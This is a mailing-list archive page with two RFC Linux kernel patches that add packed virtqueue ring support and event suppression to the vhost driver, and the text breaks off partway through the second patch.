Netdev List
 help / color / mirror / Atom feed
* [RFC PATCH V2 7/8] vhost: packed ring support
From: Jason Wang @ 2018-03-26  3:38 UTC (permalink / raw)
  To: mst, virtualization; +Cc: kvm, netdev, linux-kernel, Jason Wang
In-Reply-To: <1522035533-11786-1-git-send-email-jasowang@redhat.com>

Signed-off-by: Jason Wang <jasowang@redhat.com>
---
 drivers/vhost/net.c   |   5 +-
 drivers/vhost/vhost.c | 530 ++++++++++++++++++++++++++++++++++++++++++++++----
 drivers/vhost/vhost.h |   7 +-
 3 files changed, 505 insertions(+), 37 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 7be8b55..84905d5 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -67,7 +67,8 @@ enum {
 	VHOST_NET_FEATURES = VHOST_FEATURES |
 			 (1ULL << VHOST_NET_F_VIRTIO_NET_HDR) |
 			 (1ULL << VIRTIO_NET_F_MRG_RXBUF) |
-			 (1ULL << VIRTIO_F_IOMMU_PLATFORM)
+			 (1ULL << VIRTIO_F_IOMMU_PLATFORM) |
+			 (1ULL << VIRTIO_F_RING_PACKED)
 };
 
 enum {
@@ -706,6 +707,8 @@ static void handle_rx(struct vhost_net *net)
 	vq_log = unlikely(vhost_has_feature(vq, VHOST_F_LOG_ALL)) ?
 		vq->log : NULL;
 	mergeable = vhost_has_feature(vq, VIRTIO_NET_F_MRG_RXBUF);
+	/* FIXME: workaround for current dpdk prototype */
+	mergeable = false;
 
 	while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) {
 		sock_len += sock_hlen;
diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index dcac4d4..6177e4d 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -324,6 +324,7 @@ static void vhost_vq_reset(struct vhost_dev *dev,
 	vhost_reset_is_le(vq);
 	vhost_disable_cross_endian(vq);
 	vq->busyloop_timeout = 0;
+	vq->used_wrap_counter = true;
 	vq->umem = NULL;
 	vq->iotlb = NULL;
 	__vhost_vq_meta_reset(vq);
@@ -1136,10 +1137,22 @@ static int vhost_iotlb_miss(struct vhost_virtqueue *vq, u64 iova, int access)
 	return 0;
 }
 
-static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num,
-			struct vring_desc __user *desc,
-			struct vring_avail __user *avail,
-			struct vring_used __user *used)
+static int vq_access_ok_packed(struct vhost_virtqueue *vq, unsigned int num,
+			       struct vring_desc __user *desc,
+			       struct vring_avail __user *avail,
+			       struct vring_used __user *used)
+{
+	struct vring_desc_packed *packed = (struct vring_desc_packed *)desc;
+
+	/* FIXME: check device area and driver area */
+	return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) &&
+	       access_ok(VERIFY_WRITE, packed, num * sizeof(*packed));
+}
+
+static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num,
+			      struct vring_desc __user *desc,
+			      struct vring_avail __user *avail,
+			      struct vring_used __user *used)
 
 {
 	size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0;
@@ -1151,6 +1164,17 @@ static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num,
 			sizeof *used + num * sizeof *used->ring + s);
 }
 
+static int vq_access_ok(struct vhost_virtqueue *vq, unsigned int num,
+			struct vring_desc __user *desc,
+			struct vring_avail __user *avail,
+			struct vring_used __user *used)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vq_access_ok_packed(vq, num, desc, avail, used);
+	else
+		return vq_access_ok_split(vq, num, desc, avail, used);
+}
+
 static void vhost_vq_meta_update(struct vhost_virtqueue *vq,
 				 const struct vhost_umem_node *node,
 				 int type)
@@ -1763,6 +1787,9 @@ int vhost_vq_init_access(struct vhost_virtqueue *vq)
 
 	vhost_init_is_le(vq);
 
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return 0;
+
 	r = vhost_update_used_flags(vq);
 	if (r)
 		goto err;
@@ -1836,7 +1863,8 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len,
 /* Each buffer in the virtqueues is actually a chain of descriptors.  This
  * function returns the next descriptor in the chain,
  * or -1U if we're at the end. */
-static unsigned next_desc(struct vhost_virtqueue *vq, struct vring_desc *desc)
+static unsigned next_desc_split(struct vhost_virtqueue *vq,
+				struct vring_desc *desc)
 {
 	unsigned int next;
 
@@ -1849,11 +1877,17 @@ static unsigned next_desc(struct vhost_virtqueue *vq, struct vring_desc *desc)
 	return next;
 }
 
-static int get_indirect(struct vhost_virtqueue *vq,
-			struct iovec iov[], unsigned int iov_size,
-			unsigned int *out_num, unsigned int *in_num,
-			struct vhost_log *log, unsigned int *log_num,
-			struct vring_desc *indirect)
+static unsigned next_desc_packed(struct vhost_virtqueue *vq,
+				 struct vring_desc_packed *desc)
+{
+	return desc->flags & cpu_to_vhost16(vq, VRING_DESC_F_NEXT);
+}
+
+static int get_indirect_split(struct vhost_virtqueue *vq,
+			      struct iovec iov[], unsigned int iov_size,
+			      unsigned int *out_num, unsigned int *in_num,
+			      struct vhost_log *log, unsigned int *log_num,
+			      struct vring_desc *indirect)
 {
 	struct vring_desc desc;
 	unsigned int i = 0, count, found = 0;
@@ -1943,23 +1977,274 @@ static int get_indirect(struct vhost_virtqueue *vq,
 			}
 			*out_num += ret;
 		}
-	} while ((i = next_desc(vq, &desc)) != -1);
+	} while ((i = next_desc_split(vq, &desc)) != -1);
 	return 0;
 }
 
-/* This looks in the virtqueue and for the first available buffer, and converts
- * it to an iovec for convenient access.  Since descriptors consist of some
- * number of output then some number of input descriptors, it's actually two
- * iovecs, but we pack them into one and note how many of each there were.
- *
- * This function returns the descriptor number found, or vq->num (which is
- * never a valid descriptor number) if none was found.  A negative code is
- * returned on error. */
-int vhost_get_vq_desc(struct vhost_virtqueue *vq,
-		      struct vhost_used_elem *used,
-		      struct iovec iov[], unsigned int iov_size,
-		      unsigned int *out_num, unsigned int *in_num,
-		      struct vhost_log *log, unsigned int *log_num)
+static int get_indirect_packed(struct vhost_virtqueue *vq,
+			       struct iovec iov[], unsigned int iov_size,
+			       unsigned int *out_num, unsigned int *in_num,
+			       struct vhost_log *log, unsigned int *log_num,
+			       struct vring_desc_packed *indirect)
+{
+	struct vring_desc_packed desc;
+	unsigned int i = 0, count, found = 0;
+	u32 len = vhost32_to_cpu(vq, indirect->len);
+	struct iov_iter from;
+	int ret, access;
+
+	/* Sanity check */
+	if (unlikely(len % sizeof(desc))) {
+		vq_err(vq, "Invalid length in indirect descriptor: "
+		       "len 0x%llx not multiple of 0x%zx\n",
+		       (unsigned long long)len,
+		       sizeof desc);
+		return -EINVAL;
+	}
+
+	ret = translate_desc(vq, vhost64_to_cpu(vq, indirect->addr),
+			     len, vq->indirect,
+			     UIO_MAXIOV, VHOST_ACCESS_RO);
+	if (unlikely(ret < 0)) {
+		if (ret != -EAGAIN)
+			vq_err(vq, "Translation failure %d in indirect.\n",
+			       ret);
+		return ret;
+	}
+	iov_iter_init(&from, READ, vq->indirect, ret, len);
+
+	/* We will use the result as an address to read from, so most
+	 * architectures only need a compiler barrier here. */
+	read_barrier_depends();
+
+	count = len / sizeof desc;
+	/* Buffers are chained via a 16 bit next field, so
+	 * we can have at most 2^16 of these. */
+	if (unlikely(count > USHRT_MAX + 1)) {
+		vq_err(vq, "Indirect buffer length too big: %d\n",
+		       indirect->len);
+		return -E2BIG;
+	}
+
+	do {
+		unsigned iov_count = *in_num + *out_num;
+		if (unlikely(++found > count)) {
+			vq_err(vq, "Loop detected: last one at %u "
+			       "indirect size %u\n",
+			       i, count);
+			return -EINVAL;
+		}
+		if (unlikely(!copy_from_iter_full(&desc, sizeof(desc),
+						  &from))) {
+			vq_err(vq, "Failed indirect descriptor: idx %d, %zx\n",
+			       i, (size_t)vhost64_to_cpu(vq, indirect->addr)
+				  + i * sizeof desc);
+			return -EINVAL;
+		}
+		if (unlikely(desc.flags &
+			     cpu_to_vhost16(vq, VRING_DESC_F_INDIRECT))) {
+			vq_err(vq, "Nested indirect descriptor: idx %d, %zx\n",
+			       i, (size_t)vhost64_to_cpu(vq, indirect->addr)
+				  + i * sizeof desc);
+			return -EINVAL;
+		}
+
+		if (desc.flags & cpu_to_vhost16(vq, VRING_DESC_F_WRITE))
+			access = VHOST_ACCESS_WO;
+		else
+			access = VHOST_ACCESS_RO;
+
+		ret = translate_desc(vq, vhost64_to_cpu(vq, desc.addr),
+				     vhost32_to_cpu(vq, desc.len),
+				     iov + iov_count,
+				     iov_size - iov_count, access);
+		if (unlikely(ret < 0)) {
+			if (ret != -EAGAIN)
+				vq_err(vq, "Translation failure %d "
+					   "indirect idx %d\n",
+				       ret, i);
+			return ret;
+		}
+		/* If this is an input descriptor, increment that count. */
+		if (access == VHOST_ACCESS_WO) {
+			*in_num += ret;
+			if (unlikely(log)) {
+				log[*log_num].addr =
+					vhost64_to_cpu(vq, desc.addr);
+				log[*log_num].len =
+					vhost32_to_cpu(vq, desc.len);
+				++*log_num;
+			}
+		} else {
+			/* If it's an output descriptor, they're all supposed
+			 * to come before any input descriptors. */
+			if (unlikely(*in_num)) {
+				vq_err(vq, "Indirect descriptor "
+				       "has out after in: idx %d\n", i);
+				return -EINVAL;
+			}
+			*out_num += ret;
+		}
+	} while ((i = next_desc_packed(vq, &desc)) != -1);
+	return 0;
+}
+
+#define DESC_AVAIL (1 << VRING_DESC_F_AVAIL)
+#define DESC_USED  (1 << VRING_DESC_F_USED)
+static bool desc_is_avail(struct vhost_virtqueue *vq, __virtio16 flags)
+{
+	if (vq->used_wrap_counter)
+		if ((flags & cpu_to_vhost16(vq, DESC_AVAIL)) &&
+		    !(flags & cpu_to_vhost16(vq, DESC_USED)))
+			return true;
+	if (vq->used_wrap_counter == false)
+		if (!(flags & cpu_to_vhost16(vq, DESC_AVAIL)) &&
+		    (flags & cpu_to_vhost16(vq, DESC_USED)))
+			return true;
+
+	return false;
+}
+
+static __virtio16 get_desc_flags(struct vhost_virtqueue *vq)
+{
+	__virtio16 flags = 0;
+
+	if (vq->used_wrap_counter) {
+		flags |= cpu_to_vhost16(vq, DESC_AVAIL);
+		flags |= cpu_to_vhost16(vq, DESC_USED);
+	} else {
+		flags &= ~cpu_to_vhost16(vq, DESC_AVAIL);
+		flags &= ~cpu_to_vhost16(vq, DESC_USED);
+	}
+
+	return flags;
+}
+
+static int vhost_get_vq_desc_packed(struct vhost_virtqueue *vq,
+				    struct vhost_used_elem *used,
+				    struct iovec iov[], unsigned int iov_size,
+				    unsigned int *out_num, unsigned int *in_num,
+				    struct vhost_log *log,
+				    unsigned int *log_num)
+{
+	struct vring_desc_packed desc;
+	int ret, access, i;
+
+	/* When we start there are none of either input nor output. */
+	*out_num = *in_num = 0;
+	if (unlikely(log))
+		*log_num = 0;
+
+	used->count = 0;
+
+	do {
+		struct vring_desc_packed *d = vq->desc_packed +
+					      vq->last_avail_idx;
+		unsigned int iov_count = *in_num + *out_num;
+
+		ret = vhost_get_user(vq, desc.flags, &d->flags,
+				     VHOST_ADDR_DESC);
+		if (unlikely(ret)) {
+			vq_err(vq, "Failed to get flags: idx %d addr %p\n",
+			       vq->last_avail_idx, &d->flags);
+			return -EFAULT;
+		}
+
+		if (!desc_is_avail(vq, desc.flags)) {
+			/* If there's nothing new since last we looked, return
+			 * invalid.
+			 */
+			if (!used->count)
+				return -ENOSPC;
+			break;
+		}
+
+		/* Read desc content after we're sure it was available. */
+		smp_rmb();
+
+		ret = vhost_copy_from_user(vq, &desc, d, sizeof(desc));
+		if (unlikely(ret)) {
+			vq_err(vq, "Failed to get descriptor: idx %d addr %p\n",
+				vq->last_avail_idx, d);
+			return -EFAULT;
+		}
+
+		if (used->count == 0)
+			used->elem.id = desc.id;
+
+		if (desc.flags & cpu_to_vhost16(vq, VRING_DESC_F_INDIRECT)) {
+			ret = get_indirect_packed(vq, iov, iov_size,
+						  out_num, in_num, log,
+						  log_num, &desc);
+			if (unlikely(ret < 0)) {
+				if (ret != -EAGAIN)
+					vq_err(vq, "Failure detected "
+						   "in indirect descriptor "
+						   "at idx %d\n", i);
+				return ret;
+			}
+			goto next;
+		}
+
+		if (desc.flags & cpu_to_vhost16(vq, VRING_DESC_F_WRITE))
+			access = VHOST_ACCESS_WO;
+		else
+			access = VHOST_ACCESS_RO;
+		ret = translate_desc(vq, vhost64_to_cpu(vq, desc.addr),
+				     vhost32_to_cpu(vq, desc.len),
+				     iov + iov_count, iov_size - iov_count,
+				     access);
+		if (unlikely(ret < 0)) {
+			if (ret != -EAGAIN)
+				vq_err(vq, "Translation failure %d idx %d\n",
+					ret, i);
+			return ret;
+		}
+
+		if (access == VHOST_ACCESS_WO) {
+			/* If this is an input descriptor,
+			 * increment that count.
+			 */
+			*in_num += ret;
+			if (unlikely(log)) {
+				log[*log_num].addr =
+					vhost64_to_cpu(vq, desc.addr);
+				log[*log_num].len =
+					vhost32_to_cpu(vq, desc.len);
+				++*log_num;
+			}
+		} else {
+			/* If it's an output descriptor, they're all supposed
+			 * to come before any input descriptors.
+			 */
+			if (unlikely(*in_num)) {
+				vq_err(vq, "Desc out after in: idx %d\n",
+				       i);
+				return -EINVAL;
+			}
+			*out_num += ret;
+		}
+
+next:
+		if (unlikely(++used->count > vq->num)) {
+			vq_err(vq, "Loop detected: last one at %u "
+			       "vq size %u head %u\n",
+			       i, vq->num, used->elem.id);
+			return -EINVAL;
+		}
+		if (++vq->last_avail_idx >= vq->num)
+			vq->last_avail_idx = 0;
+	/* If this descriptor says it doesn't chain, we're done. */
+	} while (next_desc_packed(vq, &desc));
+
+	return 0;
+}
+
+static int vhost_get_vq_desc_split(struct vhost_virtqueue *vq,
+				   struct vhost_used_elem *used,
+				   struct iovec iov[], unsigned int iov_size,
+				   unsigned int *out_num, unsigned int *in_num,
+				   struct vhost_log *log, unsigned int *log_num)
 {
 	struct vring_desc desc;
 	unsigned int i, head, found = 0;
@@ -2044,9 +2329,9 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 			return -EFAULT;
 		}
 		if (desc.flags & cpu_to_vhost16(vq, VRING_DESC_F_INDIRECT)) {
-			ret = get_indirect(vq, iov, iov_size,
-					   out_num, in_num,
-					   log, log_num, &desc);
+			ret = get_indirect_split(vq, iov, iov_size,
+						 out_num, in_num,
+						 log, log_num, &desc);
 			if (unlikely(ret < 0)) {
 				if (ret != -EAGAIN)
 					vq_err(vq, "Failure detected "
@@ -2088,7 +2373,7 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 			}
 			*out_num += ret;
 		}
-	} while ((i = next_desc(vq, &desc)) != -1);
+	} while ((i = next_desc_split(vq, &desc)) != -1);
 
 	/* On success, increment avail index. */
 	vq->last_avail_idx++;
@@ -2098,6 +2383,31 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 	BUG_ON(!(vq->used_flags & VRING_USED_F_NO_NOTIFY));
 	return 0;
 }
+
+/* This looks in the virtqueue and for the first available buffer, and converts
+ * it to an iovec for convenient access.  Since descriptors consist of some
+ * number of output then some number of input descriptors, it's actually two
+ * iovecs, but we pack them into one and note how many of each there were.
+ *
+ * This function returns the descriptor number found, or vq->num (which is
+ * never a valid descriptor number) if none was found.  A negative code is
+ * returned on error.
+ */
+int vhost_get_vq_desc(struct vhost_virtqueue *vq,
+		      struct vhost_used_elem *used,
+		      struct iovec iov[], unsigned int iov_size,
+		      unsigned int *out_num, unsigned int *in_num,
+		      struct vhost_log *log, unsigned int *log_num)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_get_vq_desc_packed(vq, used, iov, iov_size,
+						out_num, in_num,
+						log, log_num);
+	else
+		return vhost_get_vq_desc_split(vq, used, iov, iov_size,
+					       out_num, in_num,
+					       log, log_num);
+}
 EXPORT_SYMBOL_GPL(vhost_get_vq_desc);
 
 void vhost_set_used_len(struct vhost_virtqueue *vq,
@@ -2248,10 +2558,69 @@ static int __vhost_add_used_n(struct vhost_virtqueue *vq,
 	return 0;
 }
 
+static int vhost_add_used_n_packed(struct vhost_virtqueue *vq,
+				   struct vhost_used_elem *heads,
+				   unsigned int count)
+{
+	struct vring_desc_packed __user *desc;
+	int i, ret;
+
+	for (i = 0; i < count; i++) {
+		desc = vq->desc_packed + vq->last_used_idx;
+
+		ret = vhost_put_user(vq, heads[i].elem.id, &desc->id,
+				     VHOST_ADDR_DESC);
+		if (unlikely(ret)) {
+			vq_err(vq, "Failed to update id: idx %d addr %p\n",
+			       vq->last_used_idx, desc);
+			return -EFAULT;
+		}
+		ret = vhost_put_user(vq, heads[i].elem.len, &desc->len,
+				     VHOST_ADDR_DESC);
+		if (unlikely(ret)) {
+			vq_err(vq, "Failed to update len: idx %d addr %p\n",
+			       vq->last_used_idx, desc);
+			return -EFAULT;
+		}
+
+		/* Update flags after descriptor id and len is wrote,
+		 * TODO: Update head flags at last for saving barriers */
+		smp_wmb();
+
+		ret = vhost_put_user(vq, get_desc_flags(vq), &desc->flags,
+				     VHOST_ADDR_DESC);
+		if (unlikely(ret)) {
+			vq_err(vq, "Failed to update flags: idx %d addr %p\n",
+			       vq->last_used_idx, desc);
+			return -EFAULT;
+		}
+
+		if (unlikely(vq->log_used)) {
+			/* Make sure desc is written before update log. */
+			smp_wmb();
+			log_write(vq->log_base, vq->log_addr +
+				  vq->last_used_idx * sizeof(*desc),
+				  sizeof(*desc));
+			if (vq->log_ctx)
+				eventfd_signal(vq->log_ctx, 1);
+		}
+
+		vq->last_used_idx += heads[i].count;
+		if (vq->last_used_idx >= vq->num) {
+			vq->used_wrap_counter ^= 1;
+			vq->last_used_idx -= vq->num;
+		}
+	}
+
+	return 0;
+}
+
 /* After we've used one of their buffers, we tell them about it.  We'll then
  * want to notify the guest, using eventfd. */
-int vhost_add_used_n(struct vhost_virtqueue *vq, struct vhost_used_elem *heads,
-		     unsigned count)
+static int vhost_add_used_n_split(struct vhost_virtqueue *vq,
+				  struct vhost_used_elem *heads,
+				  unsigned count)
+
 {
 	int start, n, r;
 
@@ -2283,6 +2652,19 @@ int vhost_add_used_n(struct vhost_virtqueue *vq, struct vhost_used_elem *heads,
 	}
 	return r;
 }
+
+/* After we've used one of their buffers, we tell them about it.  We'll then
+ * want to notify the guest, using eventfd.
+ */
+int vhost_add_used_n(struct vhost_virtqueue *vq,
+		     struct vhost_used_elem *heads,
+		     unsigned int count)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_add_used_n_packed(vq, heads, count);
+	else
+		return vhost_add_used_n_split(vq, heads, count);
+}
 EXPORT_SYMBOL_GPL(vhost_add_used_n);
 
 static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
@@ -2290,6 +2672,11 @@ static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 	__u16 old, new;
 	__virtio16 event;
 	bool v;
+
+	/* FIXME: check driver area */
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return false;
+
 	/* Flush out used index updates. This is paired
 	 * with the barrier that the Guest executes when enabling
 	 * interrupts. */
@@ -2352,7 +2739,8 @@ void vhost_add_used_and_signal_n(struct vhost_dev *dev,
 EXPORT_SYMBOL_GPL(vhost_add_used_and_signal_n);
 
 /* return true if we're sure that avaiable ring is empty */
-bool vhost_vq_avail_empty(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+static bool vhost_vq_avail_empty_split(struct vhost_dev *dev,
+				       struct vhost_virtqueue *vq)
 {
 	__virtio16 avail_idx;
 	int r;
@@ -2367,10 +2755,58 @@ bool vhost_vq_avail_empty(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 
 	return vq->avail_idx == vq->last_avail_idx;
 }
+
+static bool vhost_vq_avail_empty_packed(struct vhost_dev *dev,
+					struct vhost_virtqueue *vq)
+{
+	struct vring_desc_packed *d = vq->desc_packed + vq->last_avail_idx;
+	__virtio16 flags;
+	int ret;
+
+	ret = vhost_get_user(vq, flags, &d->flags, VHOST_ADDR_DESC);
+	if (unlikely(ret)) {
+		vq_err(vq, "Failed to get flags: idx %d addr %p\n",
+			vq->last_avail_idx, d);
+		return -EFAULT;
+	}
+
+	return desc_is_avail(vq, flags);
+}
+
+bool vhost_vq_avail_empty(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_vq_avail_empty_packed(dev, vq);
+	else
+		return vhost_vq_avail_empty_split(dev, vq);
+}
 EXPORT_SYMBOL_GPL(vhost_vq_avail_empty);
 
-/* OK, now we need to know about added descriptors. */
-bool vhost_enable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+static bool vhost_enable_notify_packed(struct vhost_dev *dev,
+				       struct vhost_virtqueue *vq)
+{
+	struct vring_desc_packed *d = vq->desc_packed + vq->last_avail_idx;
+	__virtio16 flags;
+	int ret;
+
+	/* FIXME: disable notification through device area */
+
+	/* They could have slipped one in as we were doing that: make
+	 * sure it's written, then check again. */
+	smp_mb();
+
+	ret = vhost_get_user(vq, flags, &d->flags, VHOST_ADDR_DESC);
+	if (unlikely(ret)) {
+		vq_err(vq, "Failed to get descriptor: idx %d addr %p\n",
+			vq->last_avail_idx, &d->flags);
+		return -EFAULT;
+	}
+
+	return desc_is_avail(vq, flags);
+}
+
+static bool vhost_enable_notify_split(struct vhost_dev *dev,
+				      struct vhost_virtqueue *vq)
 {
 	__virtio16 avail_idx;
 	int r;
@@ -2405,10 +2841,25 @@ bool vhost_enable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 
 	return vhost16_to_cpu(vq, avail_idx) != vq->avail_idx;
 }
+
+/* OK, now we need to know about added descriptors. */
+bool vhost_enable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_enable_notify_packed(dev, vq);
+	else
+		return vhost_enable_notify_split(dev, vq);
+}
 EXPORT_SYMBOL_GPL(vhost_enable_notify);
 
-/* We don't need to be notified again. */
-void vhost_disable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+static void vhost_disable_notify_packed(struct vhost_dev *dev,
+					struct vhost_virtqueue *vq)
+{
+	/* FIXME: disable notification through device area */
+}
+
+static void vhost_disable_notify_split(struct vhost_dev *dev,
+				       struct vhost_virtqueue *vq)
 {
 	int r;
 
@@ -2422,6 +2873,15 @@ void vhost_disable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 			       &vq->used->flags, r);
 	}
 }
+
+/* We don't need to be notified again. */
+void vhost_disable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_disable_notify_packed(dev, vq);
+	else
+		return vhost_disable_notify_split(dev, vq);
+}
 EXPORT_SYMBOL_GPL(vhost_disable_notify);
 
 /* Create a new message. */
diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
index d57c875..8a9df4f 100644
--- a/drivers/vhost/vhost.h
+++ b/drivers/vhost/vhost.h
@@ -36,6 +36,7 @@ struct vhost_poll {
 
 struct vhost_used_elem {
 	struct vring_used_elem elem;
+	int count;
 };
 
 void vhost_work_init(struct vhost_work *work, vhost_work_fn_t fn);
@@ -91,7 +92,10 @@ struct vhost_virtqueue {
 	/* The actual ring of buffers. */
 	struct mutex mutex;
 	unsigned int num;
-	struct vring_desc __user *desc;
+	union {
+		struct vring_desc __user *desc;
+		struct vring_desc_packed __user *desc_packed;
+	};
 	struct vring_avail __user *avail;
 	struct vring_used __user *used;
 	const struct vhost_umem_node *meta_iotlb[VHOST_NUM_ADDRS];
@@ -148,6 +152,7 @@ struct vhost_virtqueue {
 	bool user_be;
 #endif
 	u32 busyloop_timeout;
+	bool used_wrap_counter;
 };
 
 struct vhost_msg_node {
-- 
2.7.4

^ permalink raw reply related

* [RFC PATCH V2 8/8] vhost: event suppression for packed ring
From: Jason Wang @ 2018-03-26  3:38 UTC (permalink / raw)
  To: mst, virtualization; +Cc: kvm, netdev, linux-kernel, Jason Wang
In-Reply-To: <1522035533-11786-1-git-send-email-jasowang@redhat.com>

This patch introduces basic support for event suppression aka driver
and device area. Compile tested only.

Signed-off-by: Jason Wang <jasowang@redhat.com>
---
 drivers/vhost/vhost.c            | 169 ++++++++++++++++++++++++++++++++++++---
 drivers/vhost/vhost.h            |  10 ++-
 include/uapi/linux/virtio_ring.h |  19 +++++
 3 files changed, 183 insertions(+), 15 deletions(-)

diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 6177e4d..ff83a2e 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -1143,10 +1143,15 @@ static int vq_access_ok_packed(struct vhost_virtqueue *vq, unsigned int num,
 			       struct vring_used __user *used)
 {
 	struct vring_desc_packed *packed = (struct vring_desc_packed *)desc;
+	struct vring_packed_desc_event *driver_event =
+		(struct vring_packed_desc_event *)avail;
+	struct vring_packed_desc_event *device_event =
+		(struct vring_packed_desc_event *)used;
 
-	/* FIXME: check device area and driver area */
 	return access_ok(VERIFY_READ, packed, num * sizeof(*packed)) &&
-	       access_ok(VERIFY_WRITE, packed, num * sizeof(*packed));
+	       access_ok(VERIFY_WRITE, packed, num * sizeof(*packed)) &&
+	       access_ok(VERIFY_READ, driver_event, sizeof(*driver_event)) &&
+	       access_ok(VERIFY_WRITE, device_event, sizeof(*device_event));
 }
 
 static int vq_access_ok_split(struct vhost_virtqueue *vq, unsigned int num,
@@ -1222,14 +1227,27 @@ static int iotlb_access_ok(struct vhost_virtqueue *vq,
 	return true;
 }
 
-int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
+int vq_iotlb_prefetch_packed(struct vhost_virtqueue *vq)
+{
+	int num = vq->num;
+
+	return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc,
+			       num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
+	       iotlb_access_ok(vq, VHOST_ACCESS_WO, (u64)(uintptr_t)vq->desc,
+			       num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
+	       iotlb_access_ok(vq, VHOST_ACCESS_RO,
+			       (u64)(uintptr_t)vq->driver_event,
+			       sizeof(*vq->driver_event), VHOST_ADDR_AVAIL) &&
+	       iotlb_access_ok(vq, VHOST_ACCESS_WO,
+			       (u64)(uintptr_t)vq->device_event,
+			       sizeof(*vq->device_event), VHOST_ADDR_USED);
+}
+
+int vq_iotlb_prefetch_split(struct vhost_virtqueue *vq)
 {
 	size_t s = vhost_has_feature(vq, VIRTIO_RING_F_EVENT_IDX) ? 2 : 0;
 	unsigned int num = vq->num;
 
-	if (!vq->iotlb)
-		return 1;
-
 	return iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->desc,
 			       num * sizeof(*vq->desc), VHOST_ADDR_DESC) &&
 	       iotlb_access_ok(vq, VHOST_ACCESS_RO, (u64)(uintptr_t)vq->avail,
@@ -1241,6 +1259,17 @@ int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
 			       num * sizeof(*vq->used->ring) + s,
 			       VHOST_ADDR_USED);
 }
+
+int vq_iotlb_prefetch(struct vhost_virtqueue *vq)
+{
+	if (!vq->iotlb)
+		return 1;
+
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vq_iotlb_prefetch_packed(vq);
+	else
+		return vq_iotlb_prefetch_split(vq);
+}
 EXPORT_SYMBOL_GPL(vq_iotlb_prefetch);
 
 /* Can we log writes? */
@@ -1756,6 +1785,29 @@ static int vhost_update_used_flags(struct vhost_virtqueue *vq)
 	return 0;
 }
 
+static int vhost_update_device_flags(struct vhost_virtqueue *vq,
+				     __virtio16 device_flags)
+{
+	void __user *flags;
+
+	if (vhost_put_user(vq, cpu_to_vhost16(vq, device_flags),
+			   &vq->device_event->desc_event_flags,
+			   VHOST_ADDR_DESC) < 0)
+		return -EFAULT;
+	if (unlikely(vq->log_used)) {
+		/* Make sure the flag is seen before log. */
+		smp_wmb();
+		/* Log used flag write. */
+		flags = &vq->device_event->desc_event_flags;
+		log_write(vq->log_base, vq->log_addr +
+			  (flags - (void __user *)vq->device_event),
+			  sizeof(vq->used->flags));
+		if (vq->log_ctx)
+			eventfd_signal(vq->log_ctx, 1);
+	}
+	return 0;
+}
+
 static int vhost_update_avail_event(struct vhost_virtqueue *vq, u16 avail_event)
 {
 	if (vhost_put_user(vq, cpu_to_vhost16(vq, vq->avail_idx),
@@ -2667,16 +2719,13 @@ int vhost_add_used_n(struct vhost_virtqueue *vq,
 }
 EXPORT_SYMBOL_GPL(vhost_add_used_n);
 
-static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+static bool vhost_notify_split(struct vhost_dev *dev,
+			       struct vhost_virtqueue *vq)
 {
 	__u16 old, new;
 	__virtio16 event;
 	bool v;
 
-	/* FIXME: check driver area */
-	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
-		return false;
-
 	/* Flush out used index updates. This is paired
 	 * with the barrier that the Guest executes when enabling
 	 * interrupts. */
@@ -2709,6 +2758,79 @@ static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 	return vring_need_event(vhost16_to_cpu(vq, event), new, old);
 }
 
+static bool vhost_idx_diff(struct vhost_virtqueue *vq, u16 old, u16 new)
+{
+	if (new > old)
+		return new - old;
+	return  (new + vq->num - old);
+}
+
+static bool vhost_vring_packed_need_event(struct vhost_virtqueue *vq,
+					  __u16 event_off, __u16 new,
+					  __u16 old)
+{
+	return (__u16)(vhost_idx_diff(vq, new, event_off) - 1) <
